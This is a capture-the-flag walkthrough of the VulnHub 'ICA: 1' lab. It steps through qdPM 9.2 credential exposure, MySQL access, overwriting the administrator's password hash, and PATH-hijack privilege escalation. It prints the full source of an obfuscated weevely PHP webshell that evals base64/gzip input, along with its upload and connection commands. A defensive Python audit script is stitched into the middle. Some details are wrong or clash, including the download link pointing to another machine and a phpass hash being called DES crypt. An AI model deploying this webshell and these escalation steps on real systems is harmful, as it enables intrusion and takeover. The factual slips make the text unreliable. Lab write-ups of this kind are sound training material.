- Product Name:ICA: 1
- Chinese name: ICA: 1
- Published date: September 25, 2021
- Difficulty: Easy
- Description: Based on information from our intelligence network, the ICA is working on a secret project. We need to figure out what this project is. Once you have access information, please send it to us. We'll put a backdoor to access the system later. You just have to focus on what the project is. You may have to go through several layers of security. The IAEA is confident that you will succeed in this task. Good luck, agent!
- Download: https://www.vulnhub.com/entry/empire-breakout,751/
AILX10
1. Deployment information (IP address: 192.168.199.168)
Boot
2. Port scanning shows ports 22, 80 and 3306 open; the MySQL service banner on 3306 also reveals the database handshake salt
Salt: O*IDsu\x1B Zp4BOQ#,Uo,S
Port scanning
3. View the homepage, which is a login page and requires an email address and password
🔥 Home page
4. Scan the site for other directories to find the web application's installation directory
The directory where the website is installed
5. Search for known vulnerabilities in qdPM 9.2
qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt
qdPM 9.2 vulnerability
6. Check the exploit
The password and connection string for the database are stored in a yml file.
To access the yml file you can go to http://<website>/core/config/databases.yml file and download.
Exploit methods
7. Download the yml file and extract the database username and password
qdpmadmin
UcVQCMQk2STVeS6J
Username and password
8. Log in to the MySQL database
mysql -h 192.168.199.168 -u qdpmadmin -p
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| qdpm |
| staff |
| sys |
+--------------------+
Enter the database
9. Switch to the qdpm database and list its tables
MySQL [(none)]> use qdpm
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [qdpm]> show tables;
+----------------------+
| Tables_in_qdpm |
+----------------------+
| attachments |
| configuration |
| departments |
| discussions |
| discussions_comments |
| discussions_reports |
| discussions_status |
| events |
| extra_fields |
| extra_fields_list |
| phases |
| phases_status |
| projects |
| projects_comments |
| projects_phases |
| projects_reports |
| projects_status |
| projects_types |
| tasks |
| tasks_comments |
| tasks_groups |
| tasks_labels |
| tasks_priority |
| tasks_status |
| tasks_types |
| tickets |
| tickets_comments |
| tickets_reports |
| tickets_status |
| tickets_types |
| user_reports |
| users |
| users_groups |
| versions |
| versions_status |
+----------------------+
35 rows in set (0.021 sec)
10. Check the configuration table; it contains the site administrator's email and password hash, but the hash cannot be used to log in
| 1 | app_administrator_email | [email protected] |
| 2 | app_administrator_password | $P$EmesnWRcY9GrK0hDzwaV3rvQnMJ/Fx0 |
View the table contents
11. Since the administrator's password hash cannot be cracked, the password is replaced instead
The stored value $P$EmesnWRcY9GrK0hDzwaV3rvQnMJ/Fx0 is 34 characters long, so it is not a plain hash but a crypt(3)-style hash, a one-way hash function based on a modified DES algorithm. Generate a crypt(3) hash of the plaintext "ailx10" and update the stored password with it:
MySQL [qdpm]> update configuration set value="$1$m0IX0vwl$HR6rGO5FjvC39TsfOXWLK0" where id=2;
Query OK, 1 row affected (0.007 sec)
Rows matched: 1 Changed: 1 Warnings: 0
Create a new password
12. Log in to the administrator web page successfully
Username: [email protected]
Password: ailx10
Log in to the administrator console successfully
13. Try file upload: new users can upload avatars
Add a new user
But only pictures can be seen
Uploaded images
14. Log in as the new user ailx10 and find that attachments can be uploaded; generate a webshell file and upload it
┌──(ailx10㉿kali)-[~]
└─$ weevely generate ailx10 ./ailx10.php
Generated './ailx10.php' with password 'ailx10' of 771 byte size.
┌──(ailx10㉿kali)-[~]
└─$ cat ailx10.php
<?php
$k='$k="83b70Yz5Yz04";$kYzh="e0d874Yz2ddYz5Yzb6";$kf="Yz6e6962eb8aYz35";$p=Yz"VkTYzVUW2Z';
$I='Yz(@baYzse64_decoYzde($mYz[1]),$k))Yz);$Yzo=@oYzb_get_Yzcontents()Yz;@ob_endYz_cleaYzn';
$G='zYzntYzents("php:Yz//input"),$Yzm)==1) {@obYz_Yzstart();@eYzval(@YzgzuncoYzmpress(@x';
$O='z"Yz;Yzfor(Yz$i=0;$i<$l;){for($j=0;($j<Yz$c&&Yz$i<$l);$jYz++,$i+Yz+Yz){$o.=$t{$i}Yz^$k{';
$s=str_replace('ij','','cijreatije_ijfuijncijijtion');
$P='$j}Yz;}}rYzeYzturn $o;Yz}if Yz(@prYzeg_matcYzh("Yz/$kh(.+)$YzkYzf/"Yz,@file_get_coY';
$i='MYzT1JVyFr";fYzuYzYznction x($t,$k)Yz{$c=sYztYzrlen($k);$l=sYztrlYzen($t);Yz$o="YzY';
$N='();$Yzr=@base6Yz4_eYzncodYze(@x(Yz@gzcoYzmpress($o),$YzkYz));print("$pYz$kh$rYz$kf");}';
$J=str_replace('Yz','',$k.$i.$O.$P.$G.$I.$N);
$m=$s('',$J);$m();
?>
Upload attachments
15. Obtain a webshell successfully
weevely http://192.168.199.168/uploads/attachments/575837-ailx10.php ailx10
Get a webshell
16. Look for suspicious files and find /opt/get_access
find / -perm -u=s 2>&1 | grep -v "Permission denied"
Look for suspicious files
17. Analyzing the file shows that it runs cat /root/system.info
www-data@debian:/home $ ls -hl /opt/get_access
-rwsr-xr-x 1 root root 17K Sep 25 2021 /opt/get_access
www-data@debian:/home $ /opt/get_access
############################
######## ICA #######
### ACCESS TO THE SYSTEM ###
############################
Server Information:
- Firewall: AIwall v9.5.2
- OS: Debian 11 "bullseye"
- Network: Local Secure Network 2 (LSN2) v 2.4.1
All services are disabled. Accessing to the system is allowed only within working hours.
www-data@debian:/home $ strings /opt/get_access
/lib64/ld-linux-x86-64.so.2
setuid
socket
puts
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
cat /root/system.info
Could not create socket to access to the system.
All services are disabled. Accessing to the system is allowed only within working hours.
;*3#34;
GCC: (Debian 10.2.1-6) 10.2.1 20210110
18. Try to set the environment variable, but this webshell turns out not to be able to do so
Replace the cat command with a shell:
echo '/bin/bash' > /tmp/cat
chmod +x /tmp/cat
Try setting environment variables
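The get_access binary is exploitable only because the command string it hands to system() names cat without a path, so the shell resolves it through the caller's PATH. The following audit script is an added example, not part of the original write-up: it reproduces the strings check from the analysis above and flags setuid/setgid binaries carrying such bare command names, which is how a defender would find this pattern before an attacker does. The SHELL_TOOLS list and the SAMPLE_IMAGE bytes are constructed for illustration.

```python
"""Audit a setuid/setgid binary for shell commands it invokes by bare name."""
import re
import stat
import sys
from pathlib import Path

# Printable ASCII runs of 4+ bytes, the same thing the `strings` utility prints.
_PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
# Tools commonly run through system()/popen(); assumed list, extend for your fleet.
SHELL_TOOLS = {"cat", "ls", "cp", "mv", "rm", "sh", "bash", "id", "ps",
               "grep", "echo", "tar", "service", "systemctl", "nc"}


def extract_strings(data: bytes) -> list:
    """Return the printable strings found in a raw binary image."""
    return [m.group().decode("ascii") for m in _PRINTABLE.finditer(data)]


def hijackable_commands(data: bytes) -> list:
    """Strings whose first word is a known tool given without a directory.

    "cat /root/system.info" is reported; "/usr/bin/id -u" is not, because an
    absolute path is not subject to PATH lookup.
    """
    hits = []
    for s in extract_strings(data):
        words = s.strip().split()
        if words and words[0] in SHELL_TOOLS:
            hits.append(s.strip())
    return hits


def audit(path: str) -> dict:
    """Report whether a file is privileged and which commands it runs by name."""
    p = Path(path)
    mode = p.stat().st_mode
    return {
        "path": str(p),
        "setuid_or_setgid": bool(mode & (stat.S_ISUID | stat.S_ISGID)),
        "relative_commands": hijackable_commands(p.read_bytes()),
    }


# Constructed sample modelled on the strings output above (not the real binary).
SAMPLE_IMAGE = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + b"setuid\x00system\x00"
                b"cat /root/system.info\x00/usr/bin/id -u\x00"
                b"Could not create socket to access to the system.\x00")

if __name__ == "__main__":
    for target in sys.argv[1:]:          # e.g. every file from find / -perm -u=s
        print(audit(target))
```

A result with setuid_or_setgid true and a non-empty relative_commands list is the pattern to fix: use an absolute path, exec the program with a fixed environment, or avoid the shell entirely.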
19. The webshell is too limited, so switch to a reverse shell, from which the environment variable can be set successfully
┌──(root㉿kali)-[/home/ailx10]
└─# find / -name "php-reverse-shell.php" 2>/dev/null
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php
Reverse shell with the environment variable set
20. Privilege escalated to root successfully
Get root access
21. Find 2 flags, one for the ordinary user and one for the privileged user
2 flags
At this point the exercise is complete.